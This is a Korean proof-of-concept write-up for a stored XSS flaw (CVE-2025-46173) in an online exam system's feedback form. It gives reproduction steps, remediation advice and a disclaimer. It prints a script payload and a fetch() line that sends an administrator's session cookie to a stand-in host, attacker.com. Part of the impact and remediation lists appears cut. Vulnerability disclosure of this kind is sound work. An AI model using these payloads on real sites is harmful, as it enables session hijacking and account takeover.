
CVE-2025-46173용 PoC
CVE-2025-46173은 code-projects의 Online Exam Mastering System 1.0에서 발견된 저장형 크로스 사이트 스크립팅 (XSS) 취약점입니다. 이 취약점은 feedback.php 구성 요소에 존재하며, 이름 필드의 사용자 입력이 적절히 이스케이프되지 않아 악의적인 공격자가 임의의 JavaScript를 주입할 수 있습니다. 관리자가 이 피드백을 관리자 대시보드(dash.php)에서 조회할 때 페이로드가 관리자의 브라우저에서 실행되어 세션 하이재킹 및 잠재적인 권한 상승으로 이어집니다.
feedback.php, dash.php사용자가 피드백 양식의 이름 필드에 다음 페이로드를 제출합니다:
<script>alert(document.cookie)</script>

관리자가 나중에 dash.php에서 제출된 피드백을 조회하면 페이로드가 실행됩니다:

document.cookie를 통해 관리자의 세션 쿠키가 노출되며, 이를 유출할 수 있습니다:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
code-projects에서 취약한 버전을 클론하거나 설정합니다.
localhost/exam/feedback.php로 이동합니다.
"이름" 필드에 다음을 입력합니다:
<script>alert(document.cookie)</script>
양식을 제출합니다.
관리자로 로그인하고 dash.php?q=3으로 이동하여 피드백을 확인합니다.
스크립트가 관리자 컨텍스트에서 실행됩니다.
성공적인 익스플로잇을 통해 원격 공격자는 다음을 수행할 수 있습니다:
&, <, >, ")를 이스케이프하여 사용자 입력을 정화하세요.htmlspecialchars()와 같은 강력한 정화 라이브러리 또는 프론트엔드 검증 + 백엔드 정화 조합을 사용하세요.Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub
스크린샷은 교육 목적으로만 제공됩니다. 모든 테스트는 로컬 환경에서 수행되었습니다.
이 정보는 교육 및 연구 목적으로만 제공됩니다. 소유하지 않거나 명시적 권한이 없는 시스템에서 이를 사용하지 마십시오.